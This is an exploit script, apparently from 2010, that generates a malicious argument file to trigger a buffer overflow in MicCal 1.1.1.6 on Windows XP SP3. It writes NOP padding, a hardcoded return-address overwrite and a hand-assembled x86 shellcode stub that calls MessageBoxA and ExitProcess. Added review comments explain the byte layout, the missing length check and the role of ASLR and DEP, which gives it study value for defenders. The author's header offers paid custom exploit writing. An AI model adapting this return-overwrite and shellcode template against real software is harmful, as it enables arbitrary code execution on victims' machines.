# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition
# App. has classic buffer overflow vulnerability
# it can be triggered by passing too long argument
# as a startup parameter. Shellcode can be run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)
# Ps. If you need generic exploit ...
# (no hardcoded VA's), write it yourself ;) or 'donate few' $$$
# we will c0de it for You ^^
# Proof-of-concept file generator: writes a fixed byte sequence to `filepath`
# in this order: 340 filler bytes, a 4-byte value placed over the saved return
# address, 16 more filler bytes, then a short x86 stub.
# Written for Python 2: it uses the print statement and writes str objects to
# a file opened in binary mode.
#
# NOTE(review): the 4-byte return value and both call displacements below are
# hardcoded. The header states the only tested platform (Windows XP SP3 Home
# Edition) and says itself that this is not a "generic" (address-independent)
# sample, so the bytes are tied to that one environment.
# NOTE(review): for defenders, the layout shows what the target is missing: a
# length check on the startup argument (the root cause per the header).
# A payload of this shape presumably also depends on fixed module addresses
# and on executing bytes from the overflowed buffer, which are the assumptions
# ASLR and DEP are designed to break — confirm against the target build.
filepath = "C:\\ShellCode\\MicCal 1.1.1.6 - Exploit.bin"
# NOTE(review): no with-block, so the handle is not closed if a write raises.
f = open(filepath,"wb")
# dummy data: 340 bytes of 0x90 (x86 NOP) used as padding up to the return slot
f.write('\x90'* 340)
# overwrite ret: little-endian 0x7C9D30D7; this file does not say what lives
# at that address on the tested system
f.write('\xD7\x30\x9D\x7C')
# 8-byte author tag followed by 8 bytes of 'A': 16 filler bytes between the
# overwritten return address and the stub
f.write("[BraniX]")
f.write('A'* 8)
# start shellcode: the stub calls MessageBoxA and then ExitProcess
f.write('\x83\xEC\x08')  # sub esp,8
# presumably relies on al being 0 here so the stored byte acts as a string
# terminator — not established by this file, TODO confirm
f.write('\x88\x04\x24')  # mov byte ptr [esp], al
f.write('\x83\xEC\x08')  # sub esp,8
f.write('\x54')  # push esp
f.write('\x5B')  # pop ebx  (ebx = the stack pointer value just pushed)
# four pushes = the four MessageBoxA arguments: eax, ebx, ebx, eax
f.write('\x50')  # push eax
f.write('\x53')  # push ebx
f.write('\x53')  # push ebx
f.write('\x50')  # push eax
# E8 is a relative call: the 4-byte displacement only resolves to the intended
# API if the stub is located where the author observed it on the test machine
f.write('\xE8\x35\x08\x27\x7E')  # call user32.MessageBoxA
f.write('\x57')  # push edi  (the single ExitProcess argument)
f.write('\xE8\x57\xCB\x6E\x7C')  # call kernel32.ExitProcess
# trailing breakpoint instructions after the stub
f.write('\xCC'* 10)  # int 3's
f.close()
# Python 2 print statement; this line is a syntax error under Python 3
print "Done ..."